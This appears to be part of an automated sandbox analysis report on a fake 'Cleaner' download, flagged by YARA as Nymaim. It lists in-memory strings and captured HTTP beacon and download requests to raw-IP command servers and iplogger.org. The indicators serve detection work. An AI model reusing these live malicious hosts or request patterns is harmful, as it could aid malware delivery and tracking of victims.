Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167

Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.php
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.php$
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpCoo
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpO
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpP
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpZ
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpl
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpll
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpstem32
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpx
Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr	String found in binary or memory: http://upx.sf.net
Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agfamonotype.
Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled.
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designerseK
Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers
Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersp
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersrsivo
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr	String found in binary or memory: https://g-cleanit.hk
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.orgx
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: global traffic	HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
